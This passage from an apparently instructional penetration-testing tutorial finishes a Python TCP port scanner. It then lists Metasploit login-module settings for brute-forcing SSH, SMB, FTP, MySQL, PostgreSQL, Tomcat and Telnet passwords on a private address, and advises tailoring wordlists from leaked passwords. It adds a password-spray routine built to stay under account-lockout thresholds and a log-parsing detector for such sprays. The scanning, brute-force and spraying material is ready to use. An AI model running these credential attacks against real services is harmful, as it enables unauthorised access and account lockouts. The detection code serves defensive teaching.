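def open_ports(host: str, spec: str = "1-1024", concurrency: int = 10, timeout: float = 1.0) -> list:
    return [p for p, st in connect_scan(host, parse_ports(spec), concurrency, timeout).items()
            if st == "open"]


def demo_localhost() -> dict:
    """Offline demo: listen on one ephemeral port, release a second one, scan both."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(5)
    open_port = listener.getsockname()[1]
    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()                                  # now nothing listens there -> RST
    try:
        result = connect_scan("127.0.0.1", [open_port, closed_port], concurrency=2)
    finally:
        listener.close()
    return {"open_port": open_port, "closed_port": closed_port, "result": result}


if __name__ == "__main__":
    print(demo_localhost())
```

Every "open" result here is a completed handshake that the target service sees and logs (sshd writes a "Connection closed by ... [preauth]" line, Apache an access-log entry), which is the trade-off against the SYN scan: no privileges and pivot-friendly, but visible. DELAY and JITTER in the module exist to spread that noise out over time.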
For each service discovered, the next step is to try to brute-force its login credentials. Whether that succeeds depends almost entirely on the wordlist, which should be built for the target (names, company terms, known leaked passwords) rather than taken from a generic list. Only the configuration of the login modules is shown here; a full run takes a long time and is noisy (every failed attempt is logged by the service, and repeated failures can lock accounts), so no actual run is performed.
SSH password brute force:

use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.7
set username root
set pass_file /root/pass.txt
set threads 10
exploit

SMB (Samba) password brute force:

use auxiliary/scanner/smb/smb_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit

FTP password brute force:

use scanner/ftp/ftp_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
set threads 10
exploit

MySQL password brute force:

search mysql
use auxiliary/scanner/mysql/mysql_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

PostgreSQL password brute force:

use auxiliary/scanner/postgres/postgres_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

Tomcat manager password brute force:

search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set rhosts 192.168.1.7
set user_file /root/user.txt
set pass_file /root/pass.txt
exploit

Telnet password brute force:

use auxiliary/scanner/telnet/telnet_login
set rhosts 192.168.1.7
set username administrator
set pass_file /root/pass.txt
exploit
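All of the *_login modules above iterate a user list against a password list and stop per account on the first success. The following added example, not code from the page or from Metasploit, shows that loop from both sides: spray() drives USER_FILE x PASS_FILE password-first (every user gets the same password before the next password is tried, which keeps each account's failure count low and is how one stays under a lockout threshold), and failed_login_bursts() is the detection a defender would run over sshd's auth log to catch it. The credential store and the log lines are constructed for the example; the threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed credential store standing in for the SSH/FTP/SMB service under attack.
FAKE_ACCOUNTS = {"root": "toor", "admin": "P@ssw0rd!"}


def fake_login(user: str, password: str) -> bool:
    """Stand-in for one network login attempt (the *_login modules do this over the wire)."""
    return FAKE_ACCOUNTS.get(user) == password


def spray(users, passwords, attempt, stop_on_success=True, max_per_user=None):
    """Password-first ordering over USER_FILE x PASS_FILE. Returns (found, attempts),
    where attempts is the list of (user, password, ok) in the order they were tried."""
    found, attempts, tries = {}, [], defaultdict(int)
    for pw in passwords:
        for user in users:
            if stop_on_success and user in found:
                continue                          # STOP_ON_SUCCESS: done with this account
            if max_per_user is not None and tries[user] >= max_per_user:
                continue                          # stay under a known lockout threshold
            tries[user] += 1
            ok = attempt(user, pw)
            attempts.append((user, pw, ok))
            if ok:
                found[user] = pw
    return found, attempts


# --- defender's side: what the spray looks like in sshd's log --------------------------
# Constructed lines in the format sshd writes to /var/log/secure or auth.log.
SAMPLE_AUTH_LOG = """\
Mar 10 14:02:01 web01 sshd[2101]: Failed password for root from 192.168.1.66 port 50122 ssh2
Mar 10 14:02:02 web01 sshd[2103]: Failed password for invalid user admin from 192.168.1.66 port 50124 ssh2
Mar 10 14:02:03 web01 sshd[2105]: Failed password for root from 192.168.1.66 port 50126 ssh2
Mar 10 14:02:04 web01 sshd[2107]: Failed password for invalid user admin from 192.168.1.66 port 50128 ssh2
Mar 10 14:02:05 web01 sshd[2109]: Failed password for root from 192.168.1.66 port 50130 ssh2
Mar 10 14:02:40 web01 sshd[2140]: Accepted password for root from 192.168.1.66 port 50132 ssh2
Mar 10 09:15:10 web01 sshd[1800]: Failed password for alice from 192.168.1.20 port 40000 ssh2
Mar 10 09:15:12 web01 sshd[1801]: Accepted password for alice from 192.168.1.20 port 40002 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+")


def failed_login_bursts(log_text, threshold=5, window=timedelta(minutes=1), year=2020):
    """Flag source addresses with >= threshold failed logins inside any sliding window.
    Syslog timestamps carry no year, so one is supplied for parsing."""
    per_src = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        per_src[m["src"]].append((ts, m["user"]))
    alerts = {}
    for src, events in per_src.items():
        events.sort()
        for i, (t0, _) in enumerate(events):
            j = i
            while j < len(events) and events[j][0] - t0 <= window:
                j += 1
            if j - i >= threshold:
                alerts[src] = {"failures": j - i,
                               "users": sorted({u for _, u in events[i:j]})}
                break
    return alerts
```

The same source hitting several accounts in one window (root and admin here) is the signature of a spray rather than a forgotten password, and the "Accepted password" line that follows the burst is the one to escalate on. On the attack side, a max_per_user below the domain's lockout threshold is the difference between a quiet test and locking out every account in USER_FILE.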